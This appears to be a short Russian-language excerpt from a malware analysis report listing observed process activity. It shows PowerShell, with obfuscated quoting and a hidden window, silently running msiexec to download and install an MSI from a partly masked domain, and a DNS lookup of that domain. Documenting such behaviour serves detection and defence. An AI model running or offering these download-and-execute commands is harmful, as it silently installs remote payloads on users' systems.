Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' msie'xec' /q /i http://be####backrooo2.com/host_f77d.msi
- DNS ASK be####backrooo2.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' msie'xec' /q /i http://be####backrooo2.com/host_f77d.msi' (со скрытым окном)
- '<SYSTEM32>\msiexec.exe' /q /i http://be####backrooo2.com/host_f77d.msi